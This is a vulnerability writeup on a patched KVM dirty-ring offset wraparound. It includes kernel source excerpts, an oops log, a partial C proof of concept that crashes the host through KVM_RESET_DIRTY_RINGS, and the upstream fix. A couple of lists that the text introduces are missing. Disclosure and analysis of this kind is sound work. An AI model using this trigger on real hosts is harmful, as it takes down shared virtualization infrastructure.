back

A KVM dirty-ring OOB that the allocator quietly defuses

A u64 wraparound in KVM's dirty-ring bounds check lets a userspace VMM drive an out-of-bounds index into the per-memslot reverse-map array. The rmap array lives in vmalloc address space, so the access lands inside the preceding guard page and faults before any value is loaded. The result is a deterministic host-kernel DoS. This writeup walks the bounds check, the wraparound, and why the vmalloc guard page closes the door cleanly enough that nothing downstream is reachable.

Verified on Linux v6.13.7 and v7.0.6. Target: virt/kvm/dirty_ring.c and arch/x86/kvm/mmu/mmu.c. Patched upstream on 2026-05-12 as commit 577a8d3bae05 ("KVM: Reject wrapped offset in kvm_reset_dirty_gfn()"), Cc: stable@vger.kernel.org. Fixes fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking") — the original 5.10 introduction of the dirty ring.

Setup — the dirty ring is shared writable

KVM's dirty-ring tracking is the mechanism the host uses to tell the VMM which guest pages were dirtied since the last sync. Each ring entry is a struct kvm_dirty_gfn with three fields: flags, slot, and offset. The ring pages are mmap'd by the VMM with PROT_READ | PROT_WRITE — intentionally, because the VMM needs to ack entries by writing flags. kvm_vcpu_mmap() at kvm_main.c:3982 does not strip VM_WRITE for dirty-ring pages, and nothing else policies which fields the VMM is allowed to scribble on.

The bug is that the kernel also reads the slot and offset fields back from the ring during reset — after the VMM has had a chance to overwrite them with values the kernel never wrote.

// virt/kvm/dirty_ring.c:125-126 -- kvm_dirty_ring_reset
next_slot   = READ_ONCE(entry->slot);    // attacker-controlled
next_offset = READ_ONCE(entry->offset);  // attacker-controlled

READ_ONCE prevents the compiler from re-reading the field and racing with itself; it does not validate that the value matches what the kernel originally wrote. The trust boundary between host and VMM is being crossed in the wrong direction here.

Root cause — the bounds check wraps in u64

Inside kvm_reset_dirty_gfn(), the kernel coalesces a 64-bit mask of nearby dirty offsets and validates the highest bit against the memslot:

// virt/kvm/dirty_ring.c:69 -- kvm_reset_dirty_gfn
if (!memslot || (offset + __fls(mask)) >= memslot->npages)
    return;

Both offset and __fls(mask) are u64. With offset = 0xFFFFFFFFFFFFFFC1 and __fls(mask) = 63, the sum is 0x10000000000000000, truncated to 0. Zero is less than npages, so the check passes. The wrapped value of offset — still 0xFFFFFFFFFFFFFFC1 — is what propagates downstream.

Reaching the corner case requires getting __fls(mask) high enough. That is done by the coalescing loop a few lines up:

// virt/kvm/dirty_ring.c:138-142
s64 delta = next_offset - cur_offset;
if (delta >= 0 && delta < BITS_PER_LONG) {
    mask |= 1ull << delta;
    continue;
}

Two crafted ring entries are enough. The first sets offset = 0xFFFFFFFFFFFFFFC1, the second sets offset = 0. As a signed 64-bit subtraction, 0 - 0xFFFFFFFFFFFFFFC1 = 63, which falls inside [0, BITS_PER_LONG). Bit 63 of mask gets set; __fls(mask) = 63; the wrap fires.

Downstream — OOB into the rmap array

The wrapped offset reaches gfn_to_rmap() through the standard write-protect path:

// arch/x86/kvm/mmu/mmu.c:1010-1016 -- gfn_to_rmap
idx = gfn_to_index(gfn, slot->base_gfn, level);
return &slot->arch.rmap[level - PG_LEVEL_4K][idx];
// arch/x86/kvm/mmu/mmu.c:1213-1233 -- kvm_mmu_write_protect_pt_masked
while (mask) {
    rmap_head = gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
                            PG_LEVEL_4K, slot);
    rmap_write_protect(rmap_head, false);
    mask &= mask - 1;
}

With the wrap, idx evaluates to 0xFFFFFFFFFFFFFFC1 — i.e. -63 when interpreted as a signed offset into the array. Since sizeof(struct kvm_rmap_head) = 8, the addressable target is exactly 8 * 63 = 504 bytes before the rmap allocation. More generally, varying which bit in mask drives __fls yields a backward window of [-8, -504] bytes from rmap_array_base.

rmap_write_protect() then reads rmap_head->val at the OOB address. If non-zero, it interprets the value as either a direct SPTE pointer or a pte_list_desc * and clears the writable bit. That is a kernel OOB read followed by a conditional kernel OOB write at an attacker-influenced address. On a slab allocation it would be the start of a familiar exploit chain.

The half-step — where the rmap actually lives

The previous draft of this writeup assumed the rmap array was a slab object, and reasoned about spraying kmalloc-2048 or kmalloc-4096 neighbours to control the value at rmap_head->val. That reasoning is wrong. Look at the allocator:

// arch/x86/kvm/x86.c:13483
slot->arch.rmap[i] = __vcalloc(lpages, sz, GFP_KERNEL_ACCOUNT);

__vcalloc() is a thin wrapper around __vmalloc_array_noprof() — always vmalloc, never slab. Every vmalloc area allocated through __get_vm_area_node() gets a guard page reserved immediately before it, unless VM_NO_GUARD is set. The rmap array does not set VM_NO_GUARD. The 4 KiB region directly preceding the rmap base is therefore an unmapped guard page, populated in the page tables only enough that the walk descends — the leaf PTE is zero.

The OOB window is [-8, -504] bytes. The guard page is 4096 bytes. The window fits inside the guard for every conceivable configuration of the allocator. The OOB load faults; the conditional write below it never executes.

Runtime verification

Stage A of the PoC drives the kernel into the OOB load and produces the following oops on v7.0.6 with kvm.tdp_mmu=0 (so that kvm_memslots_have_rmaps() is true):

BUG: unable to handle page fault for address: ffffaa6580034e08
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 1000067 P4D 1000067 PUD 1146067 PMD 1147067 PTE 0
RIP: 0010:rmap_write_protect+0x6/0xf0
RAX: ffffffffffffffc1   RBX: 8000000000000001
RDI: ffffaa6580034e08   RDX: ffffaa6580035000

Every register tells you exactly what happened:

This is not a "got unlucky and faulted" outcome — it is structural. The guard page sits between the previous vmalloc allocation and this one by allocator invariant. Every configuration of memslot size, NUMA placement, and surrounding vmap state preserves it.

Reachability of the conditional write

The conditional clear-bit primitive in rmap_write_protect() requires rmap_head->val to load successfully and return a non-zero value that passes either the direct-SPTE or the pte_list_desc interpretation. The load itself faults before any value is consumed, so:

The OOB access faults before any value reaches downstream code. It is a host-kernel oops, full stop.

Proof of concept

Two ring entries with crafted offset values, a KVM_RESET_DIRTY_RINGS ioctl, and a host that panics on the spot:

// 1. Create VM with dirty ring enabled
int kvm_fd = open("/dev/kvm", O_RDWR);
int vm_fd  = ioctl(kvm_fd, KVM_CREATE_VM, 0);
// ... enable KVM_CAP_DIRTY_LOG_RING, create a memslot,
//     create a vCPU, run it long enough to push entries ...

// 2. Map the dirty ring read-write
struct kvm_dirty_gfn *ring = mmap(NULL, ring_size,
    PROT_READ | PROT_WRITE, MAP_SHARED,
    vcpu_fd, KVM_DIRTY_LOG_PAGE_OFFSET * PAGE_SIZE);

// 3. Mark all entries RESET, plant the wraparound pair
for (int i = 0; i < num_entries; i++) {
    ring[i].flags = KVM_DIRTY_GFN_F_RESET;
    if (i == target_idx) {
        ring[i].slot   = 0;
        ring[i].offset = 0xFFFFFFFFFFFFFFC1ULL;   // wraps the bound
    } else if (i == target_idx + 1) {
        ring[i].slot   = 0;
        ring[i].offset = 0;                       // delta = 63
    }
}

// 4. Trigger reset -- OOB rmap access -> guard-page fault -> oops
ioctl(vm_fd, KVM_RESET_DIRTY_RINGS, 0);

Preconditions: /dev/kvm access (typically the kvm group), KVM_CAP_DIRTY_LOG_RING enabled, and a memslot with an allocated rmap. The last requires shadow paging (ept=0 / npt=0 or kvm.tdp_mmu=0), nested virtualization with shadow roots, or write-tracked slots. Not guest-triggerable — the ring is mapped only from the vCPU fd, which only the VMM holds.

Impact

FactorValue
Attack vectorLocal (VMM process with /dev/kvm)
ComplexityLow (mmap + two ioctls)
Privileges required/dev/kvm access, typically kvm group
User interactionNone
ScopeUnchanged — VMM userspace crashes the host kernel
ConfidentialityNone (OOB load is consumed internally; no readback channel)
IntegrityNone (the OOB access faults before any value is loaded)
AvailabilityHigh (deterministic host kernel oops/panic)

The upstream fix

The patch is two lines. It splits the addition so the first sub-expression cannot wrap, and the second sub-expression can only execute once offset is known small. memslot->npages is bounded well below U64_MAX, so once offset < npages holds and __fls(mask) < BITS_PER_LONG, the sum cannot overflow into the valid range.

--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(...)

 	memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);

-	if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+	if (!memslot || offset >= memslot->npages ||
+	    offset + __fls(mask) >= memslot->npages)
 		return;

 	KVM_MMU_LOCK(kvm);

Landed as 577a8d3bae05 on 2026-05-12, marked Fixes: fb04a1eddb1a and Cc: stable@vger.kernel.org for backport to every kernel that ever shipped KVM_CAP_DIRTY_LOG_RING (5.10+).

The rmap array is __vcalloc'd, so the OOB walks into vmalloc's guard page instead of adjacent kernel memory — the allocator decision, not the bounds check, is what kept this bounded.

References

FieldValue
Upstream commit577a8d3bae05
TitleKVM: Reject wrapped offset in kvm_reset_dirty_gfn()
Fixesfb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking")
StableCc: stable@vger.kernel.org — backport to all kernels with KVM_CAP_DIRTY_LOG_RING (5.10+)